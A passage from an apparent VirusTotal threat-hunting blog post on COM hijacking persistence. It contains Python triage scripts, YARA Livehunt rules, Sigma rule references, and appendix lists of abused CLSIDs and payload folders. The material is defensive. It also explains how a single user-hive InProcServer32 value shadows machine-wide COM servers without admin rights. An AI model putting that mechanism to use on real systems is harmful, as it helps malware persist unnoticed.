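The folder list above translates directly into a triage filter for registry telemetry. The following Python script is an added example, not code from the original post or from VirusTotal: it takes registry "value set" events in the shape Sysmon Event ID 13 reports them (key path plus the value written), keeps only writes to a CLSID's InProcServer32 default value, and flags those that land in a user hive or whose DLL sits in one of the folders above. The sample events, the SID and the DLL file names are constructed for the example; the two flagged CLSIDs are taken from the Appendix.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Key pattern for the default value of an InProcServer32 subkey under any CLSID.
CLSID_INPROC_RE = re.compile(
    r"\\CLSID\\\{(?P<clsid>[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-"
    r"[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12})\}\\InProcServer32\\\(Default\)$",
    re.IGNORECASE,
)

# Folders listed in the post as the usual hiding places for the payload DLLs:
# (label, regex on the normalised lower-case DLL path, writable by a standard user?)
SUSPICIOUS_LOCATIONS = [
    ("appdata_roaming",   r"^c:\\users\\[^\\]+\\appdata\\roaming\\", True),
    ("appdata_local",     r"^c:\\users\\[^\\]+\\appdata\\local\\",   True),
    ("program_files_x86", r"^c:\\program files \(x86\)\\",          False),
    ("syswow64",          r"^c:\\windows\\syswow64\\",               False),
]


@dataclass
class Finding:
    clsid: str
    hive: str
    dll_path: str
    location: Optional[str]   # label from SUSPICIOUS_LOCATIONS, or None
    user_hive: bool           # registered under HKCU or HKU\S-1-5-21-...
    needs_admin: bool         # DLL sits in a folder a standard user cannot write to


def _normalise(path: str) -> str:
    """Strip quotes, unify slashes and lower-case the path so the regexes above apply."""
    return path.strip().strip('"').replace("/", "\\").lower()


def triage_registry_event(target_object: str, details: str) -> Optional[Finding]:
    r"""Classify one registry 'value set' event (Sysmon Event ID 13 style).

    target_object: full key path ending in ...\CLSID\{GUID}\InProcServer32\(Default)
    details:       the value written, i.e. the DLL path
    Returns None when the event is not a COM in-process server registration.
    """
    m = CLSID_INPROC_RE.search(target_object)
    if not m:
        return None
    hive = target_object.split("\\", 1)[0].upper()
    dll = _normalise(details)
    location, needs_admin = None, False
    for label, pattern, user_writable in SUSPICIOUS_LOCATIONS:
        if re.match(pattern, dll):
            location, needs_admin = label, not user_writable
            break
    # COM consults the per-user classes (HKCU\Software\Classes) before HKLM for
    # non-elevated processes, so a user-hive registration needs no admin rights and
    # silently shadows the machine-wide server for that CLSID.
    user_hive = hive in ("HKCU", "HKEY_CURRENT_USER", "HKU", "HKEY_USERS")
    return Finding(m.group("clsid").upper(), hive, dll, location, user_hive, needs_admin)


def suspicious_findings(events):
    """Keep the registrations worth an analyst's time: anything written to a user hive,
    or any registration whose DLL lives in one of the folders from the post."""
    out = []
    for target, details in events:
        f = triage_registry_event(target, details)
        if f is not None and (f.user_hive or f.location is not None):
            out.append(f)
    return out


# Constructed sample events (TargetObject, Details); the CLSIDs in the first two come
# from the Appendix, the SID and DLL names are made up for the example.
SAMPLE_EVENTS = [
    (r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\CLSID"
     r"\{79FAA099-1BAE-816E-D711-115290CEE717}\InProcServer32\(Default)",
     r"C:\Users\alice\AppData\Roaming\qmacro\qmacro.dll"),
    (r"HKLM\SOFTWARE\Classes\CLSID\{22C6C651-F6EA-46BE-BC83-54E83314C67F}"
     r"\InProcServer32\(Default)",
     r"C:\Program Files (x86)\Google\update.dll"),
    # Constructed benign entry: a system DLL registered machine-wide (not flagged).
    (r"HKLM\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}"
     r"\InProcServer32\(Default)",
     r"C:\Windows\System32\ieframe.dll"),
    # Not a COM registration at all (Run key), ignored by the regex.
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     r"C:\Users\alice\AppData\Roaming\updater.exe"),
]

if __name__ == "__main__":
    for finding in suspicious_findings(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints the two flagged findings. The `needs_admin` flag records the point made in the list above: a payload under Program Files (x86) or SysWow64 implies the dropper already had administrative rights, whereas the AppData locations and a user-hive registration need none, which is why they dominate the data.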
<h1 style="text-align: left;">Detection
</h1>
<div class="interval_12">To detect unusual modifications to the registry keys that define COM objects, there are a couple of crowdsourced Sigma rules that identify this behavior.
</div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a
href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml"
style="text-decoration-line: none;"><span
style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; text-wrap: wrap; vertical-align: baseline;">Potential
Persistence Via COM Hijacking From Suspicious Locations</span></a><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">
(high level). Detects COM server registrations (the InProcServer32 / LocalServer32 default value) whose path points to a suspicious, typically user-writable, location.</span></p>
</li>
</ul><br />
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a
href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml"
style="text-decoration-line: none;"><span
style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; text-wrap: wrap; vertical-align: baseline;">Potential
Persistence Via COM Search Order Hijacking</span></a><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">
(medium risk level). Similar to the previous rule, it also filters out paths associated with
legitimate behaviors.</span></p>
</li>
</ul>
<div class="interval_12">These rules detect uncommon registry modifications related to COM objects. You can use the following queries to retrieve the samples that triggered each rule: <a href="https://www.virustotal.com/gui/search/sigma_rule%253Ac64a541b46d176ef960f347f5e86ee15927eb668f86a5f9f6260bbc94b1d2f3a" target="_blank">VTI query for sigma1</a> and <a href="https://www.virustotal.com/gui/search/sigma_rule%253A7f5d257abc981b5eddb52d4a9a02fb66201226935cf3d39177c8a81c3a3e8dd4" target="_blank">VTI query for sigma2</a>.
</div>
<div class="interval_12">You can also identify this behavior with Livehunt rules that watch for the creation of the registry keys used for this purpose, for instance through the <mark class="my-yara-code"><mark class="red">vt.behaviour.registry_keys_set</mark></mark> field of the sandbox report.
</div>
<pre>import "vt"

// Flags new, widely detected files whose sandbox run registers a COM in-process
// server, i.e. writes the default value of a CLSID's InProcServer32 subkey.
rule CLSID_COM_Hijacking {
  meta:
    target_entity = "file"
    hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
    author = "@Joseliyo_Jstnk"
    mitre_technique = "T1546.015"
    mitre_tactic = "TA0003"
  condition:
    vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and
    for any vt_behaviour_registry_keys_set in vt.behaviour.registry_keys_set: (
      // e.g. HKCU\Software\Classes\CLSID\{GUID}\InProcServer32\(Default)
      vt_behaviour_registry_keys_set.key matches /\\CLSID\\\{[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\}\\InProcServer32\\\(Default\)/
    )
}</pre>
<div class="interval_12">The rule above might generate some noise, so consider refining it by excluding common, already well-covered families such as Berbew, which as mentioned relies heavily on this technique:
</div>
<pre>and not
(
  // Drop samples that any engine already labels as Berbew (case-insensitive match)
  for any engine, signature in vt.metadata.signatures : (
    signature icontains "berbew"
  )
)</pre>
<div class="interval_12">You can also use the paths listed in the Appendix to identify suspicious samples that use them.
</div>
<div class="interval_12">A final option is to reuse existing Sigma rules in our Livehunt rule. Since those rules already cover the targeted registry keys, we do not need <mark class="my-yara-code"><mark class="red">vt.behaviour.registry_keys_set</mark></mark> in our condition; matching on the Sigma rule identifier is enough.
</div>
<pre>import "vt"

// Same trigger as the previous rule, but the registry check is delegated to the
// crowdsourced Sigma rule matched in the sandbox report.
rule CLSID_COM_Hijacking_Sigma {
  meta:
    target_entity = "file"
    hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
    author = "@Joseliyo_Jstnk"
    sigma_authors = "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien"
    mitre_technique = "T1546.015"
    mitre_tactic = "TA0003"
  condition:
    vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and
    for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (
      // rule_id of the second Sigma rule listed above (sigma2)
      vt_behaviour_sigma_analysis_results.rule_id == "7f5d257abc981b5eddb52d4a9a02fb66201226935cf3d39177c8a81c3a3e8dd4"
    )
}</pre>
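The Livehunt rules above hunt for the technique in VirusTotal's sandbox reports; on an endpoint the equivalent check is to compare the per-user CLSID tree against the machine-wide one, since a COM hijack is by definition an HKCU InProcServer32 that shadows (or has no counterpart in) HKLM. The following Python is an added example, not part of the original post or of any VirusTotal tooling: it works on plain dictionaries of CLSID to DLL path that you would export from the registry yourself, reports every user-hive override, and then ranks them by how many hosts share the same override, the prevalence idea from the Appendix. The registry snapshots, DLL names and host names are constructed; the CLSIDs come from the Appendix.

```python
import re


def _norm(path: str) -> str:
    """Lower-case, unify slashes and replace the profile name so the same payload under
    different user profiles compares equal (the <user> notation used in the post)."""
    p = path.strip().strip('"').replace("/", "\\").lower()
    return re.sub(r"^c:\\users\\[^\\]+\\", r"c:\\users\\<user>\\", p)


def find_user_hive_overrides(hklm_clsids, hkcu_clsids):
    """Return (clsid, hklm_dll_or_None, hkcu_dll) for every CLSID registered in the
    user hive that does not agree with the machine hive.

    For non-elevated processes COM resolves HKCU\\Software\\Classes before
    HKLM\\Software\\Classes, so an InProcServer32 in HKCU that differs from HKLM
    (or has no HKLM counterpart at all) is what a COM hijack looks like at rest.
    Elevated processes ignore the per-user classes, which is why the technique is a
    persistence mechanism rather than a privilege escalation.
    """
    hits = []
    for clsid, user_dll in hkcu_clsids.items():
        machine_dll = hklm_clsids.get(clsid)
        if machine_dll is None or _norm(machine_dll) != _norm(user_dll):
            hits.append((clsid.upper(), machine_dll, user_dll))
    return hits


def rare_overrides(fleet, max_hosts=1):
    """Prevalence filter: overrides seen on at most max_hosts hosts across the fleet.
    fleet maps hostname -> (hklm_clsids, hkcu_clsids). Returns {(clsid, dll): [hosts]}."""
    hosts_by_key = {}
    for host, (hklm, hkcu) in fleet.items():
        for clsid, _, user_dll in find_user_hive_overrides(hklm, hkcu):
            hosts_by_key.setdefault((clsid, _norm(user_dll)), []).append(host)
    return {key: hosts for key, hosts in hosts_by_key.items() if len(hosts) <= max_hosts}


# Constructed registry snapshots (what a `reg export` of the CLSID trees would give
# you); CLSIDs are taken from the Appendix, DLL names and hosts are made up.
HKLM_CLSID = {
    "{79FAA099-1BAE-816E-D711-115290CEE717}": r"C:\Windows\System32\machine_a.dll",
    "{EBEB87A6-E151-4054-AB45-A6E094C5334B}": r"C:\Windows\System32\machine_b.dll",
}
FLEET = {
    "ws01": (HKLM_CLSID, {
        "{79FAA099-1BAE-816E-D711-115290CEE717}": r"C:\Users\alice\AppData\Roaming\qmacro\qmacro.dll",
        "{EBEB87A6-E151-4054-AB45-A6E094C5334B}": r"C:\Windows\System32\machine_b.dll",  # agrees with HKLM
    }),
    "ws02": (HKLM_CLSID, {
        "{79FAA099-1BAE-816E-D711-115290CEE717}": r"C:\Users\bob\AppData\Roaming\qmacro\qmacro.dll",
    }),
    "ws03": (HKLM_CLSID, {
        # No HKLM counterpart: a CLSID only the user hive knows about.
        "{D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4}": r"C:\Program Files (x86)\Microsoft\plugin.dll",
    }),
}

if __name__ == "__main__":
    for host, (hklm, hkcu) in FLEET.items():
        for hit in find_user_hive_overrides(hklm, hkcu):
            print(host, hit)
    print("rare:", rare_overrides(FLEET))
```

`find_user_hive_overrides` is the detection; `rare_overrides` is the triage order. In the constructed fleet the qmacro override appears on two hosts and the Program Files (x86) one on a single host, so with the default threshold only the latter is reported as rare. Raise `max_hosts` to see both, and treat an override shared by many hosts as either a legitimate per-user install or an outbreak, never as noise.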
<h1 style="text-align: left;">Wrapping up
</h1>
<div class="interval_12">The T1546.015 - Event Triggered Execution: Component Object Model Hijacking technique is just one of several used for persistence. Leveraging COM objects for this task is frequently straightforward for threat actors: a single registry value written in the user hive is enough. Analyzing how malware abuses this technique helps us better understand how to identify different families and develop protection methods. Although it is not the most popular persistence technique (that would be T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), it is widely abused by many malware families.
</div>
<div class="interval_12">Identifying the most abused CLSIDs helps us write detection rules for possible abuse in our own infrastructure. The list also serves as a prevalence baseline: a CLSID registration that is rare across the fleet, or that points to one of the folders above, stands out as an anomaly worth investigating.
</div>
<div class="interval_12">VirusTotal sandbox reports are a powerful tool for translating TTPs into actionable queries and monitoring. In this example we used them to understand how attackers abuse COM objects, but the same approach applies to any technique employed by different threat actors.
</div>
<div class="interval_12">We hope you join our fan club of Sigma and VirusTotal, and as always <a href="https://www.virustotal.com/gui/contact-us" target="_blank">we are happy to hear your feedback</a>.
</div>
<h1 style="text-align: left;">APPENDIX
</h1>
<h2 style="text-align: left;">Abused CLSIDs
</h2>
<div class="interval_12">Next, you'll find a list of the main CLSIDs described in the blog, along with a chart to show which ones were used the most.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/Dn_TKOQbzGbN6WR3mwhz34h0pZAPNXhCVrEfwKkmfkk5MeYZ2LoRp3a0IwUgoEBsOau9ewHpjxuXMAoL9BsrY82z3iXijDpi65ZM3tvn1Cvo1OIfIp2xeurNAjRH3ugmBaraveflDx2MB-3kCIXMonrU94mM5mEHZmD7rttkjubPlLV4KgWnTn65DSChYyI" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> <table style="border-collapse: collapse; border: none; " >
<colgroup>
<col width="443">
</col>
</colgroup>
<tbody>
<tr style="height: 5pt;" class="table-fields">
<td
style="background-color: #394eff; border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">CLSID
- COM Objects</span></p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">79FAA099-1BAE-816E-D711-115290CEE717</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">EBEB87A6-E151-4054-AB45-A6E094C5334B</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">241D7F03-9232-4024-8373-149860BE27C0</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C07DB6A3-34FC-4084-BE2E-76BB9203B049</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">79ECA078-17FF-726B-E811-213280E5C831</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">22C6C651-F6EA-46BE-BC83-54E83314C67F</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">F4CBF20B-F634-4095-B64A-2EBCDD9E560E</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">57477331-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C73F6F30-97A0-4AD1-A08F-540D4E9BC7B9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">89565275-A714-4a43-912E-978B935EDCCC</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">26037A0E-7CBD-4FFF-9C63-56F2D0770214</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">16426152-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">33414471-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">23716116-126E-4FC8-B430-1C6143484AA9</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">79FEACFF-FFCE-815E-A900-316290B5B738</span>
</p>
</td>
</tr>
<tr style="height: 5pt;">
<td
style="border-bottom: solid #000000 0.68181825pt; border-left: solid #000000 0.68181825pt; border-right: solid #000000 0.68181825pt; border-top: solid #000000 0.68181825pt; overflow-wrap: break-word; overflow: hidden; padding: 1pt 1pt 1pt 1pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">74A94F46-4FC5-4426-857B-FCE9D9286279</span>
</p>
</td>
</tr>
</tbody>
</table> </div>
<h2 style="text-align: left;">Common paths
</h2>
<div class="interval_12">Below you will find a list with some of the most common paths used during the creation of the COM objects for persistence. The table contains the 'parent' paths as well, while the chart includes only the 'subpaths'.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/Apy2CDZzU_kZqC5EwbVrWhJSZ8VcmyvGVwrxTn5PXiOdFez2r6Tm1JOJHzSt-7J6nGWg8qYbR9qRF5yFN2Ua6M8Id1dLg9-weNnfmrNFafRxJayw0oy7SNZG9y1gxSvjYsg3CuMMRyUrf5ecDe1YSsC-GwavMoumQa2_ruWN6NI9dKC91VHmNAiz0_d-keY" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> <table style="border-collapse: collapse; border: none;">
<colgroup>
<col width="444">
</col>
</colgroup>
<tbody>
<tr style="height: 15.75pt;" class="table-fields">
<td
style="background-color: #394eff; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Common
paths used during COM object persistence</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\&lt;user&gt;\AppData\Roaming</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
